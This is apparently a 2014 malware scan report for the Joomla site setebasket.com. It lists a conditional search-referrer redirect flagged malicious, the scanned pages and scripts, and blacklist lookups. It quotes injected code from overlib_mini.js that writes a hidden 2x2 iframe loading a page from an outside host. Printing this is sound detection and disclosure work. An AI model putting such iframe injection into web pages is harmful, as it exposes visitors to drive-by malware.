Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://setebasket.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: setebasket.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 07 Aug 2014 20:20:04 GMT Location: http://tinyurl.com/bslq4t8 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
| Request | Server response | Status |
http://setebasket.com/ | 200 OK Content-Length: 47825 Content-Type: text/html | clean |
http://setebasket.com/plugins/system/2j_tabs/jq_last.js | 200 OK Content-Length: 31979 Content-Type: application/javascript | clean |
http://setebasket.com/plugins/system/2j_tabs/2j.ui.base.js | 200 OK Content-Length: 3724 Content-Type: application/javascript | clean |
http://setebasket.com/plugins/system/2j_tabs/2j.ui.tabs.js | 200 OK Content-Length: 6637 Content-Type: application/javascript | clean |
http://setebasket.com/plugins/system/mediaobject/js/mediaobject-150.js | 200 OK Content-Length: 3721 Content-Type: application/javascript | clean |
http://setebasket.com/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/javascript | clean |
http://setebasket.com/includes/js/overlib_mini.js | 200 OK Content-Length: 36988 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=922112></iframe>'); var olLoaded=0,pmStart=10000000,pmUpper=10001000,pmCount=pmStart+1,pmt='',pms=new Array(),olInfo=new Info('4.21',1),FREPLACE=0,FBEFORE=1,FAFTER=2,FALTERNATE=3,FCHAIN=4,olHideForm=0,olHautoFlag=0,olVautoFlag=0,hookPts=new Array(),postParse=new Array(),cmdLine=new Array(),runTime=new Array(); registerCommands('donothing,in var olCheckMouseCapture=true;if((olNs4||olNs6||olIe4)){olMouseCapture();}else{overlib=no_overlib;nd=no_overlib;ver3fix=true;} Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/aeed.html?j=922112 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/aeed.html?j=922112> | ||
http://setebasket.com/components/com_joomgallery/assets/js/joomscript.js | 200 OK Content-Length: 15014 Content-Type: application/javascript | clean |
http://setebasket.com/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 2206 Content-Type: application/javascript | clean |
http://setebasket.com/modules/mod_bannerslider/tmpl/mod_bannerslider.js | 200 OK Content-Length: 4896 Content-Type: application/javascript | clean |
http://setebasket.com/modules/mod_yoo_toppanel/mod_yoo_toppanel.js | 200 OK Content-Length: 1281 Content-Type: application/javascript | clean |
http://setebasket.com/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 26073 Content-Type: application/javascript | clean |
http://setebasket.com/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 3978 Content-Type: application/javascript | clean |
http://setebasket.com/modules/mod_aqsg_newsflash/js/jscroller2-1.5.js | 200 OK Content-Length: 5321 Content-Type: application/javascript | clean |
http://setebasket.com/user/reset.html | 200 OK Content-Length: 17962 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=setebasket.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://setebasket.com/
Result: setebasket.com is not infected or malware details are not published yet.
Result: setebasket.com is not infected or malware details are not published yet.